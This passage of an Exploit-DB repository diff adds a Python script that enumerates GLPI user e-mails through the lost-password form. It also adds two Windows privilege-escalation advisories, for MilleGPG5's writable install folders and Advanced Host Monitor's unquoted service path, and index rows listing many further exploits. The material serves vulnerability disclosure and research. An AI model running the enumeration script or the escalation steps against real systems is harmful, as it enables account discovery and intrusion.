9.5.7 - Username Enumeration +# Date: 04/29/2023 +# Author: Rafael B. +# Vendor Homepage: https://glpi-project.org/pt-br/ +# Affected Versions: GLPI version 9.1 <= 9.5.7 +# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz + + +import requests +from bs4 import BeautifulSoup + +# Send a GET request to the page to receive the csrf token and the cookie session +response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') + +# Parse the HTML using BeautifulSoup +soup = BeautifulSoup(response.content, 'html.parser') + +# Find the input element with the CSRF token +csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) + +# Extract the CSRF token if it exists +if csrf_input: + csrf_token = csrf_input['value'] + +# Extract the session cookie +session_cookie_value = None +if response.cookies: + session_cookie_value = next(iter(response.cookies.values())) +# Set the custom url where the GLPI recover password is located +url = "http://127.0.0.1:80/glpi/front/lostpassword.php" +headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"} + +# Open the email list file and read each line +with open('emails.txt', 'r') as f: + email_list = f.readlines() + +# Loop through the email list and make a POST request for each email +for email in email_list: + email = email.strip() + data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token} + cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value} + freq = requests.post(url, headers=headers, cookies=cookies, data=data) + + # Do a new GET request to get the updated CSRF token and session cookie for the next iteration + response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1') + soup = BeautifulSoup(response.content, 'html.parser') + csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')}) + if csrf_input: + csrf_token = csrf_input['value'] + session_cookie_value = None + if response.cookies: + session_cookie_value = next(iter(response.cookies.values())) + + # Parse the response and grep the match e-mails + soup = BeautifulSoup(freq.content, 'html.parser') + div_center = soup.find('div', {'class': 'center'}) + Result = (f"Email: {email}, Result: {div_center.text.strip()}") + if "An email has been sent to your email address. The email contains information for reset your password." in Result: + print ("\033[1;32m Email Found! -> " + Result) \ No newline at end of file diff --git a/exploits/windows/local/51410.txt b/exploits/windows/local/51410.txt new file mode 100644 index 000000000..5c366f0cf --- /dev/null +++ b/exploits/windows/local/51410.txt @@ -0,0 +1,37 @@ +# Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control +# Date: 2023-04-28 +# Exploit Author: Andrea Intilangelo +# Vendor Homepage: https://millegpg.it/ +# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/ +# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe +# Version: 5.9.2 +# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913 +# CVE: CVE-2023-25438 + +MilleGPG / MilleGPG5 also known as "Governo Clinico 3" + +Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l. + +Affected/tested version: MilleGPG5 5.9.2 + +Summary: +Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through the +Italian general practice network. +MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes, +complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for the +General Practitioner, also offering contextual access to the most authoritative scientific content and CME training. + +Vuln desc: +The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing some +files to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weakness +abusing the "write" permission of the main application available to all users on the system or network. + + +Details: +Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.: + +C:\Program Files\MilleGPG5\MilleGPG5.exe (main gui application) +C:\Program Files\MilleGPG5\plugin\ (GPGCommand.exe, nginx and php files) +C:\Program Files\MilleGPG5\k-platform\ (api and webapp files) + +such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA \ No newline at end of file diff --git a/exploits/windows/local/51412.txt b/exploits/windows/local/51412.txt new file mode 100644 index 000000000..a8116c568 --- /dev/null +++ b/exploits/windows/local/51412.txt @@ -0,0 +1,59 @@ +# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path +# Date: 2023-04-23 +# CVE: CVE-2023-2417 +# Exploit Author: MrEmpy +# Vendor Homepage: https://www.ks-soft.net +# Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm +# Version: > 12.56 +# Tested on: Windows 10 21H2 + + +Title: +================ +Advanced Host Monitor > 12.56 - Unquoted Service Path + + +Summary: +================ +An unquoted service path vulnerability has been discovered in Advanced Host +Monitor version > 12.56 affecting the executable "C:\Program Files +(x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when +the service's path is misconfigured, allowing an attacker to run a +malicious file instead of the legitimate executable associated with the +service. + +An attacker with local user privileges could exploit this vulnerability to +replace the legitimate RMA-Win\rma_active.exe service executable with a +malicious file of the same name and located in a directory that has a +higher priority than the legitimate directory. That way, when the service +starts, it will run the malicious file instead of the legitimate +executable, allowing the attacker to execute arbitrary code, gain +unauthorized access to the compromised system, or stop the service from +functioning. + +To exploit this vulnerability, an attacker would need local access to the +system and the ability to write and replace files on the system. The +vulnerability can be mitigated by correcting the service path to correctly +quote the full path of the executable, including quotation marks. +Furthermore, it is recommended that users keep software updated with the +latest security updates and limit physical and network access to their +systems to prevent malicious attacks. + + +Proof of Concept: +================ + +C:\>sc qc ActiveRMAService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ActiveRMAService + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files +(x86)\HostMonitor\RMA-Win\rma_active.exe /service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : KS Active Remote Monitoring Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d0c5ae0e7..49cd5f147 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -3250,6 +3250,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50773,exploits/hardware/local/50773.sh,"Cyclades Serial Console Server 3.3.0 - Local Privilege Escalation",2022-02-21,ibby,local,hardware,,2022-02-21,2022-02-21,0,,,,,, 24899,exploits/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Local Privilege Escalation",2013-03-29,"Mohammad abou hayt",local,hardware,,2013-03-29,2013-03-29,0,OSVDB-91811,,,,, 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",2021-09-13,Neurogenesia,local,hardware,,2021-09-13,2021-09-13,0,,,,,, +51414,exploits/hardware/local/51414.py,"FS-S3900-24T4S - Privilege Escalation",2023-05-02,"Daniele Linguaglossa",local,hardware,,2023-05-02,2023-05-02,0,CVE-2023-30350,,,,, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,,2018-03-19,2018-03-19,0,CVE-2015-8088,,,,,https://github.com/hardenedlinux/offensive_poc/blob/0cfe3764a0388e3715b018d1d59ef801f8b16b73/CVE-2015-8088/cve-2015-8088-poc.c 47763,exploits/hardware/local/47763.txt,"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials",2019-12-10,LiquidWorm,local,hardware,,2019-12-10,2019-12-10,0,,,,,, 45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware,,2018-11-05,2018-11-05,0,CVE-2018-5407,,,,,https://github.com/bbbrumley/portsmash/tree/e3e7447ba04e1a8a5637cabadf3403faf94f7a56 @@ -12168,7 +12169,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",2021-07-01,"Audencia Business SCHOOL Red Team",webapps,multiple,,2021-07-01,2021-07-01,0,,,,,, 11409,exploits/multiple/webapps/11409.txt,"Video Games Rentals Script - SQL Injection",2010-02-11,JaMbA,webapps,multiple,80,2010-02-10,2010-11-12,1,OSVDB-62295;CVE-2010-0690,,,,, 38706,exploits/multiple/webapps/38706.txt,"VideoLAN VLC Media Player Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",webapps,multiple,,2015-11-16,2015-11-16,0,OSVDB-130352,,,,, -51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-03-30,0,,,,,, +51142,exploits/multiple/webapps/51142.txt,"Virtual Reception v1.0 - Web Server Directory Traversal",2023-03-30,Spinae,webapps,multiple,,2023-03-30,2023-05-02,0,CVE-2023-25289,,,,, 50098,exploits/multiple/webapps/50098.txt,"Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)",2021-07-06,"Andrea D\'Ubaldo",webapps,multiple,,2021-07-06,2021-10-15,0,CVE-2021-42071,,,,, 48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,,2020-06-01,2020-06-01,0,CVE-2020-3952,,,,, 50056,exploits/multiple/webapps/50056.py,"VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-06-24,CHackA0101,webapps,multiple,,2021-06-24,2021-10-28,0,CVE-2021-21972,,,,, @@ -13413,6 +13414,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21005,exploits/php/webapps/21005.txt,"Admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",webapps,php,,2012-09-02,2016-11-28,1,CVE-2012-4749;CVE-2012-4748;OSVDB-85146;OSVDB-85145,,,,http://www.exploit-db.comadmidio-2.3.5.zip,http://www.darksecurity.de/advisories/2012/SSCHADV2012-019.txt 42005,exploits/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",webapps,php,,2017-05-15,2017-05-15,1,CVE-2017-8382,,,,http://www.exploit-db.comadmidio-3.2.8.zip, 45322,exploits/php/webapps/45322.txt,"Admidio 3.3.5 - Cross-Site Request Forgery (Change Permissions)",2018-09-03,"Nawaf Alkeraithe",webapps,php,80,2018-09-03,2018-09-03,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadmidio-3.3.5.zip, +51402,exploits/php/webapps/51402.txt,"admidio v4.2.5 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 36290,exploits/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,webapps,php,,2011-11-07,2015-03-06,1,,,,,,https://www.securityfocus.com/bid/50562/info 9161,exploits/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-56235;CVE-2009-2558,,,,, 9153,exploits/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,webapps,php,,2009-07-14,,1,OSVDB-55856;CVE-2009-2557,,,,, @@ -15999,6 +16001,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50425,exploits/php/webapps/50425.txt,"Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,, 50404,exploits/php/webapps/50404.txt,"Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)",2021-10-13,"Yash Mahajan",webapps,php,,2021-10-13,2021-10-13,0,,,,,, 50421,exploits/php/webapps/50421.txt,"Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)",2021-10-18,"Aniket Deshmane",webapps,php,,2021-10-18,2021-10-18,0,,,,,, +51417,exploits/php/webapps/51417.txt,"Companymaps v8.0 - Stored Cross Site Scripting (XSS)",2023-05-02,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-02,2023-05-02,0,CVE-2023-29983,,,,, 32875,exploits/php/webapps/32875.txt,"Comparison Engine Power 1.0 - 'product.comparision.php' SQL Injection",2009-03-25,SirGod,webapps,php,,2009-03-25,2014-04-15,1,,,,,,https://www.securityfocus.com/bid/34232/info 5834,exploits/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection",2008-06-17,Mr.SQL,webapps,php,,2008-06-16,,1,OSVDB-46289;CVE-2008-2791,,,,, 42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,,2017-10-10,2017-10-10,0,,,,,, @@ -19039,6 +19042,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51229,exploits/php/webapps/51229.txt,"GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34127,,,,, 49992,exploits/php/webapps/49992.py,"GLPI 9.4.5 - Remote Code Execution (RCE)",2021-06-14,"Brian Peters",webapps,php,,2021-06-14,2021-06-14,0,CVE-2020-11060,,,,, 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,,2021-03-08,2021-03-08,0,,,,,, +51418,exploits/php/webapps/51418.py,"GLPI 9.5.7 - Username Enumeration",2023-05-02,"Rafael B.",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51232,exploits/php/webapps/51232.txt,"GLPI Activity v3.1.0 - Authenticated Local File Inclusion on Activity plugin",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-34125,,,,, 51230,exploits/php/webapps/51230.txt,"GLPI Glpiinventory v1.0.1 - Unauthenticated Local File Inclusion",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31062,,,,, 51233,exploits/php/webapps/51233.txt,"GLPI v10.0.2 - SQL Injection (Authentication Depends on Configuration)",2023-04-03,"Nuri Çilengir",webapps,php,,2023-04-03,2023-04-03,0,CVE-2022-31056,,,,, @@ -24929,6 +24933,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49784,exploits/php/webapps/49784.py,"OpenEMR 5.0.2.1 - Remote Code Execution",2021-04-21,Hato0,webapps,php,,2021-04-21,2021-04-21,0,,,,,, 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",2021-09-06,"Allen Enosh Upputori",webapps,php,,2021-09-06,2021-09-06,0,CVE-2021-40352,,,,, 14011,exploits/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",webapps,php,,2010-06-24,2010-06-24,1,OSVDB-65745,,,,, +51413,exploits/php/webapps/51413.py,"OpenEMR v7.0.1 - Authentication credentials brute force",2023-05-02,"abhhi (Abhishek Birdawade)",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 17998,exploits/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",webapps,php,,2011-10-19,2011-12-01,1,OSVDB-70134,,,,, 27823,exploits/php/webapps/27823.txt,"openEngine 1.7/1.8 - Template Unauthorized Access",2006-05-08,ck@caroli.info,webapps,php,,2006-05-08,2016-12-23,1,CVE-2006-2280;OSVDB-25359,,,,http://www.exploit-db.comopenengine17.zip,https://www.securityfocus.com/bid/17871/info 17951,exploits/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection Vulnerabilities",2011-10-10,"Stefan Schurtz",webapps,php,,2011-10-10,2011-12-04,0,OSVDB-76155,,,,http://www.exploit-db.comopenengine20_beta4.zip,http://www.rul3z.de/advisories/SSCHADV2011-019.txt @@ -25973,6 +25978,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32241,exploits/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,webapps,php,,2008-08-13,2014-03-14,1,CVE-2008-3682;OSVDB-47382,,,,,https://www.securityfocus.com/bid/30678/info 8658,exploits/php/webapps/8658.txt,"PHP recommend 1.3 - Authentication Bypass / Remote File Inclusion / Code Injection",2009-05-11,scriptjunkie,webapps,php,,2009-05-10,,1,OSVDB-54720;CVE-2009-1781;OSVDB-54719;CVE-2009-1780;OSVDB-54718;CVE-2009-1779,,,,, 50699,exploits/php/webapps/50699.txt,"PHP Restaurants 1.0 - SQLi (Unauthenticated)",2022-02-02,"Nefrit ID",webapps,php,,2022-02-02,2022-02-02,0,,,,,, +51398,exploits/php/webapps/51398.txt,"PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting",2023-05-02,Or4nG.M4N,webapps,php,,2023-05-02,2023-05-02,0,,,,,, 36551,exploits/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,webapps,php,,2012-01-15,2015-03-30,1,,,,,,https://www.securityfocus.com/bid/51418/info 29258,exploits/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",webapps,php,,2013-10-31,2013-10-31,1,OSVDB-99594,,,,, 31022,exploits/php/webapps/31022.txt,"PHP Running Management 1.0.2 - 'index.php' Cross-Site Scripting",2008-01-13,"Christophe VG",webapps,php,,2008-01-13,2014-01-17,1,CVE-2008-0258;OSVDB-40261,,,,,https://www.securityfocus.com/bid/27268/info @@ -26761,6 +26767,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 2313,exploits/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,webapps,php,,2006-09-05,2016-09-09,1,OSVDB-28574;CVE-2006-4644,,,,http://www.exploit-db.comphpfullannu-v5.1.zip, 48497,exploits/php/webapps/48497.txt,"PHPFusion 9.03.50 - Persistent Cross-Site Scripting",2020-05-21,coiffeur,webapps,php,,2020-05-21,2020-05-21,0,,,,,, 49911,exploits/php/webapps/49911.py,"PHPFusion 9.03.50 - Remote Code Execution",2021-05-28,g0ldm45k,webapps,php,,2021-05-28,2021-06-28,1,CVE-2020-24949,,,,"http://www.exploit-db.comPHP-Fusion 9.03.50.zip", +51411,exploits/php/webapps/51411.txt,"PHPFusion 9.10.30 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 7540,exploits/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",webapps,php,,2008-12-20,,1,,,,,, 15573,exploits/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,webapps,php,,2010-11-19,2015-07-12,0,,,,,, 3699,exploits/php/webapps/3699.txt,"PHPGalleryScript 1.0 - 'init.gallery.php?include_class' Remote File Inclusion",2007-04-10,anonymous,webapps,php,,2007-04-09,,1,OSVDB-34811;CVE-2007-2019,,,,, @@ -26860,6 +26867,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 32441,exploits/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,webapps,php,,2008-09-29,2014-03-23,1,,,,,,https://www.securityfocus.com/bid/31467/info 30952,exploits/php/webapps/30952.html,"PHPJabbers Property Listing Script 2.0 - Cross-Site Request Forgery (Add Admin)",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102221,,,,, 50475,exploits/php/webapps/50475.txt,"PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)",2021-11-03,Vulnerability-Lab,webapps,php,,2021-11-03,2021-11-03,0,,,,,, +51416,exploits/php/webapps/51416.txt,"PHPJabbers Simple CMS 5.0 - SQL Injection",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,, +51415,exploits/php/webapps/51415.txt,"PHPJabbers Simple CMS V5.0 - Stored Cross-Site Scripting (XSS)",2023-05-02,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,, 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,, 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,, @@ -27079,6 +27088,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip, 43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip, 33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info +51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info 27585,exploits/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,webapps,php,,2006-04-10,2016-12-30,1,CVE-2006-1713;OSVDB-24704,,,,,https://www.securityfocus.com/bid/17420/info 7392,exploits/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,webapps,php,,2008-12-08,2016-10-27,1,OSVDB-52751;CVE-2008-6317;OSVDB-18331;CVE-2008-6316;CVE-2008-6315,,,,, @@ -28035,6 +28045,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info 35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,, +51400,exploits/php/webapps/51400.txt,"projectSend r1605 - Private file download",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,, 35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip, 36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip, @@ -28566,6 +28577,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 43821,exploits/php/webapps/43821.txt,"ReviewPost < 2.84 - Multiple Vulnerabilities",2015-01-02,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00060;CVE-2005-0270;CVE-2005-0271;CVE-2005-0272,,,,,http://gulftech.org/advisories/ReviewPost%20Multiple%20Vulnerabilities/60 41939,exploits/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",webapps,php,,2017-04-26,2017-04-26,0,,,,,http://www.exploit-db.comrevive-adserver-4.0.1.zip, 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,,2019-12-03,2019-12-03,0,CVE-2019-5434,,,,http://www.exploit-db.comrevive-adserver-4.2.0.tar.gz, +51401,exploits/php/webapps/51401.txt,"revive-adserver v5.4.1 - Cross-Site Scripting (XSS)",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,, 5677,exploits/php/webapps/5677.py,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,webapps,php,,2008-05-26,2016-12-02,1,OSVDB-46454;CVE-2008-2778,,,,http://www.exploit-db.comRevokeBB_RC11_webinstall.zip, 4020,exploits/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve",2007-06-01,BlackHawk,webapps,php,,2007-05-31,2016-10-05,1,OSVDB-38366;CVE-2007-3051,,,,http://www.exploit-db.comRevokeBB_1_0_RC3.zip, 12726,exploits/php/webapps/12726.txt,"REvolution 10.02 - Cross-Site Request Forgery",2010-05-24,"High-Tech Bridge SA",webapps,php,,2010-05-23,,0,OSVDB-64679,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_npds_revolution.html @@ -29062,6 +29074,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 5960,exploits/php/webapps/5960.txt,"SePortal 2.4 - 'poll_id' SQL Injection",2008-06-27,Mr.SQL,webapps,php,,2008-06-26,2016-12-09,1,OSVDB-46567;CVE-2008-5191;OSVDB-46566,,,,, 18222,exploits/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,webapps,php,,2011-12-09,2016-12-14,0,OSVDB-77591,,,,http://www.exploit-db.comseportal2.5.zip, 51373,exploits/php/webapps/51373.txt,"Serendipity 2.4.0 - Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, +51403,exploits/php/webapps/51403.txt,"Serendipity 2.4.0 - File Inclusion RCE",2023-05-02,nu11secur1ty,webapps,php,,2023-05-02,2023-05-02,0,,,,,, 51372,exploits/php/webapps/51372.txt,"Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,, 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,, 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip, @@ -29764,6 +29777,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28780,exploits/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - 'Grid3.lib.php' Remote File Inclusion",2006-10-10,k1tk4t,webapps,php,,2006-10-10,2013-10-07,1,,,,,,https://www.securityfocus.com/bid/20442/info 2520,exploits/php/webapps/2520.txt,"Softerra PHP Developer Library 1.5.3 - Remote File Inclusion",2006-10-12,MP,webapps,php,,2006-10-11,2017-10-07,1,OSVDB-29623;CVE-2006-5472;OSVDB-29622;OSVDB-29621,,,,http://www.exploit-db.comPHPLibrary-1.5.3.zip,http://pastebin.com/r7LCdeTC 3600,exploits/php/webapps/3600.txt,"Softerra Time-Assistant 6.2 - 'inc_dir' Remote File 